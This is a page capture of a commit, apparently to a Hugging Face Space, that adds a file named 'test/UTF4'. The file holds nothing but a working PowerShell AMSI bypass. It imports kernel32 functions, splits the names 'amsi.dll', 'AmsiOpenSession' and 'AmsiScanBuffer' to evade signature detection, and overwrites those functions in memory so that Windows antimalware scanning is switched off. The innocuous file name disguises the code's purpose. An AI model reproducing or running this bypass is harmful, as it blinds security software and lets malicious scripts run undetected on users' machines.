Spaces:
Runtime error
Runtime error
Create UTF4
Browse files
test/UTF4
ADDED
|
@@ -0,0 +1,29 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
$W = @"
|
| 2 |
+
using System;using System.Runtime.InteropServices;
|
| 3 |
+
public class W {
|
| 4 |
+
[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
|
| 5 |
+
[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);
|
| 6 |
+
[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
|
| 7 |
+
}
|
| 8 |
+
"@
|
| 9 |
+
Add-Type $W
|
| 10 |
+
|
| 11 |
+
$L = [W]::LoadLibrary("am" + "si.dll")
|
| 12 |
+
$AmsiOpenSession = [W]::GetProcAddress($L, "Amsi" + "Open" + "Session")
|
| 13 |
+
$AmsiScanBuffer = [W]::GetProcAddress($L, "Amsi" + "Scan" + "Buffer")
|
| 14 |
+
|
| 15 |
+
function ChangeMemoryProtection($address, $size, $protection) {
|
| 16 |
+
$oldProtect = 0
|
| 17 |
+
[W]::VirtualProtect($address, [uint32]$size, $protection, [ref]$oldProtect) | Out-Null
|
| 18 |
+
}
|
| 19 |
+
|
| 20 |
+
$NopCode = [Byte[]](0x48, 0x31, 0xC0)
|
| 21 |
+
$PatchCode = [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
|
| 22 |
+
|
| 23 |
+
ChangeMemoryProtection $AmsiOpenSession 3 0x40
|
| 24 |
+
[System.Runtime.InteropServices.Marshal]::Copy($NopCode, 0, $AmsiOpenSession, 3)
|
| 25 |
+
ChangeMemoryProtection $AmsiOpenSession 3 0x20
|
| 26 |
+
|
| 27 |
+
ChangeMemoryProtection $AmsiScanBuffer 6 0x40
|
| 28 |
+
[System.Runtime.InteropServices.Marshal]::Copy($PatchCode, 0, $AmsiScanBuffer, 6)
|
| 29 |
+
ChangeMemoryProtection $AmsiScanBuffer 6 0x20
|